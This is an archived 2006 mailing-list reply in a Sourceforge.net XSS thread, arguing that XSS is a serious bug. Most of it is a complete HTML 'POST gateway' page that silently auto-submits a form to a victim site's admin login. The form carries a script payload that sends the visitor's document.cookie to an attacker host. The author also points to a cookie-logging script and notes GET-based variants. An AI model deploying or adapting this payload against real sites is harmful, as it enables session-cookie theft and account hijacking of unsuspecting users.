Vulnerability Development mailing list archives

Re: Sourceforge.net XSS

From: ascii <ascii () katamail com>
Date: Fri, 14 Apr 2006 05:15:13 +0200

v9 () fakehalo us wrote:

I understand the possibilities of XSS, however if you 
have to inject it as part of the URL

[cut]

xss are serious bugs, as like header injection and session fixation

xss are less critical than full sql injections + onto outfile in your
cgi-bin directory (for example) or other vectors

anyway, an xss can be exploited in many ways and also in conjunction
with other technologies as like phishing

an other way could be a doorway page as like for http post xss

this is an example

--example.html--

<html>
<head>
 <title>title</title>
 <style type="text/css" media="screen,print">
 body { margin:0; padding:0; }
 body, html{ font-family:"Trebuchet MS", Georgia, Verdana, serif;
color:white; }
 a { color:white; text-decoration:none; }
 </style>
 </head>
 <body onload="document.login_form.submit()"><!-- force gateway, onload -->
 <table width="100%" height="100%" bgcolor="#9BBB38"><tr><td
valign="center" align="center">

  <!-- simple and effective, xss post gateway coded by ascii, vuln by
saidone -->
  <form method="post" action="http://www.VICTIM.TLD/admin/index.php";
name="login_form">
   <input type="hidden" id="user" name="FIELD_username"
value="<script>javascript:alert('XSS vuln, your cookie is
'+document.cookie+'. Now your PHP session is haxored and the cookie
value is sent back to the malicious haxor! (Press OK to send the cookie
value and continue you hajacked navigation..)');document.write('<img
src=\'http://ATTACKER.TLD/cookie.php?cookie='+document.cookie+'\&apos;>');</script>"
/>
   <input type="hidden" id="pass" name="FIELD_password" value="" />
   <!--<button type="submit" name="submit">Vai</button>-->
  </form>
  <div style="background-color: green; height: 95%; width: 95%;"
onclick="document.login_form.submit()"
onmouseover="document.login_form.submit()"><!-- force gateway, onclick
and onmouseover -->
   <h1><a href="#" onclick="document.login_form.submit()">click
everywhere</a></h1><!-- force gateway, onclick -->
  </div>
  <!-- the end : ) -->

</td></tr></table><img src="http://devel.ush.it/track/me.php"; /><a
href="http://www.ush.it";>www.ush.it</a>
</body>

--/example.html--

cookie.php will store the user session cookie, if you need a generic
logger you could dump any GPC variables as done by this simple script

http://www.ush.it/team/ascii/hack-xsstrap/track.phps

for http get xss you could use meta refresh or document.location
directly (simplier to implement, less code)

regards, ascii, http://www.ush.it/

Current thread:

Sourceforge.net XSS the . spikey (Apr 09)
- <Possible follow-ups>
- Re: Sourceforge.net XSS v9 (Apr 12)
  - Re: Sourceforge.net XSS Daniel (Apr 12)
- Re: Re: Sourceforge.net XSS v9 (Apr 13)
  - Re: Sourceforge.net XSS ascii (Apr 13)
- Re: Sourceforge.net XSS Juan C Calderon (Apr 17)
  - Re: Sourceforge.net XSS v9 (Apr 17)
    - Re: Sourceforge.net XSS morgan allen (Apr 18)
    - Re: Sourceforge.net XSS Valdis . Kletnieks (Apr 18)
    - Re: Sourceforge.net XSS Juan C Calderon (Apr 18)